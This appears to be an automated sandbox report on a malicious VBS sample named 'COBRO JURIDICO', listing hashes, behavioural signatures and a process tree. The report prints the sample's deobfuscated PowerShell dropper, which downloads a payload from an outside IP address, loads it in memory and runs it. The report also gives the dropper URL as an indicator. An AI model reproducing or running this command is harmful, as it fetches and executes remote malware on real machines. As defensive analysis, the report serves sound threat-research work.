Analysis

max time kernel: 43s
max time network: 47s
platform: windows7_x64
resource: win7-20220901-en
resource tags: arch:x64, arch:x86, image:win7-20220901-en, locale:en-us, os:windows7-x64, system
submitted: 09/10/2022, 06:14

Static task: static1
Behavioral task: behavioral1
Sample: 56325762828282 COBRO JURIDICO.vbs
Resource: win7-20220901-en
5 signatures
150 seconds
General

Target: 56325762828282 COBRO JURIDICO.vbs
Size: 437KB
MD5: 3ae400fde403322cee0a88408828cba8
SHA1: 7aac489534006c5de8080d639f29f9fdcc5a0079
SHA256: 3b8b7f389603923a9fabf32a34ba6301ed3df38ee7eeaac068c8c108409b5532
SHA512: 2c435502f2900ed9d45c340e35e3f41110e6dfd981c60898bf30a4d8e971435f80674b6073d05faf33fae6ef7a907c3e9908586051155ced341878c5dfbb6084
SSDEEP: 48:kklC0eHz7/m7rJv4PsfbuUbNbbldPQ/Pe20NrFR4PLEvvldI:nl+/mrOeqUZldSPKNrY4vvldI
Score: 10/10
Malware Config

Extracted
Language: ps1
Deobfuscated
URLs:
  ps1.dropper  http://20.7.14.99/dll/dll_ink.pdf
Signatures

Blocklisted process makes network request (1 IoCs)
  flow  pid   Process
  3     1028  powershell.exe

Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  1028  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  1028  powershell.exe

Suspicious use of WriteProcessMemory (3 IoCs)
  description                   pid   Process      procid_target
  PID 1672 wrote to memory of 1028  1672  WScript.exe  27
  PID 1672 wrote to memory of 1028  1672  WScript.exe  27
  PID 1672 wrote to memory of 1028  1672  WScript.exe  27
Processes

1. C:\Windows\System32\WScript.exe
   "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\56325762828282 COBRO JURIDICO.vbs"
   - Suspicious use of WriteProcessMemory
   PID: 1672

   2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string((New-Object Net.WebClient).DownloadString('http://20.7.14.99/dll/dll_ink.pdf'));[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('0/YUskG/d/ee.etsap//:sptth'))
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 1028